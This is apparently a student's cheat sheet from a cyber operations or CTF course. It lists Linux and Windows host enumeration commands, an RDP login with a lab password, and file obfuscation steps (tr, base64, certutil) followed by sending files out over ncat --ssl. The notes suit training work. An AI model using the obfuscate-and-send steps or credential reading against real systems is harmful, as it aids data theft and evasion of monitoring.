
WHEN SCP SPECIFY PORT WITH -P

 xfreerdp /u:comrade /p:StudentMidwayPassword /dynamic-resolution +clipboard /v:127.0.0.1:11930
created a port to 3389 and ran this on linops

+++++ MAKE SURE TO LOOK AT ALL TEXT FILES OR FILES THAT DIFFER FROM THE REST IN A DIR+++++++++=
pay attention to keywords in ctfd and try searching key words
==============================================================

local host enumeration
win - net user, tasklist /v, tasklist /svc, ipconfig /all, 
lin - cat /etc/passwd,  ps -elf, chkconfig#SysVm, systemctl --type=service# SystemD, ip a/ifconfig -a,

Session Transcript
ssh <user>@<host> | tee

Obfuscation (Windows)
type <file> | %{$_ -replace 'a','b' -replace 'b','c' -replace 'c','d'} > translated.out
certutil -encode <file> encoded.b64

Obfuscation (Linux)
cat <file> | tr 'a-zA-Z0-9' 'b-zA-Z0-9a' > shifted.txt
cat <file>> | base64

Encrypted Transport
scp <source> <destination>
ncat --ssl <ip> <port> < <file>
=====================================================================================

dont touch 10.10 or 10.0

once i get on box
L I N U X 
when it says enumerate user directories prety much means go through everyfile.
whoami
hostname
ip a / ifconfig
ls -latr
ls -latr ..
ls -latr /tmp
ps -elf  ignore [] processes 

if rsyslogd running problem
cat /etc/rsyslog.conf
cat /etc/rsyslog.d/*
normal log location /var/log
 

systemctl --type=service
ss -ntlp
netstat -anutp
ip neigh
cat /etc/group
cat /etc/passwd
nobody should be in root group.
cat /etc/hosts  !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
find / -type f -iname "log" 2>/dev/null
find / -type f -iname "*.log" -exec md5sum {} \; 2>/dev/null
find hidden directiories/files (change type) - find / -type d -name ".*" 2/dev/null
ls -latr /etc/cron*/

   Scheduled tasks
    	ls -l /etc/cron*
    	/var/spool/crontab
===========================================================================

W I N D O W S

whoami
hostname
ipconfig /all
query user
netstat 
tasklist /v
wmic process get Name,ExecutablePath,Processid,ParentProcessid
arp -a
net user
net localgroup 
net share
sc query or search services in search bar
